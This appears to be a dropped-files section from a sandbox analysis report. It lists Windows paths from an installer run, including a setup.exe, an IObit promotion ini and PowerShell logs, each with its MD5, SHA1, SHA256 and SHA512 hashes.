C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp\EULA.rtf

MD5 b0381f0ba7ead83ea3bd882c1de4cd48
SHA1 c740f811623061595d76fce2ebb4e69d34316f3b
SHA256 44bc9472169403484a0d384f1ca81989ef7e4b07441758e8a0110078933cbcb5
SHA512 6cfb8bc562d22843d043411720db97d0b4cbac96a20983d83d19e59b8428ec202f2532cc5af254438dc34fca4161abbd3f6bac8d397590e41b6d41e60700e78a

C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe

MD5 3d403676517f6a99de035a04dc3f3f82
SHA1 ed69d8f485374dfb58a5b651b1f3f1bab8ee9541
SHA256 668f4f4ef277783cc66408d6631b63e9a24ffcd978834835fdb8fb2aa345a56e
SHA512 4ba6f75e9b518474bf9b846cda386bde0ca65233dd489b357b967e842af71ebca6e325b9fc9b8a0d1d775b16198ff31a6c2d2223797d2a3c490d5da001e8887e

C:\ProgramData\IObit\iobitpromotion.ini

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\1713116766\ENGLISH.lng

MD5 8e7f2723f0e72bc6abefca738c9c1ca4
SHA1 969a4a6f31e146040a101d526886ede9a7c5c432
SHA256 f3c690feab9ab2b7dea8ea6334b484768f19caaf85dfa14be2bce5e4fdbffd4b
SHA512 9a3efa9dd002394050cbd457adb67121fcae7a31b66b42e3d612725b9166bd76c4f8c73ed039226c16248461c7f4f1fb6cac91960b7bb57a3273fbd022b1e232

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
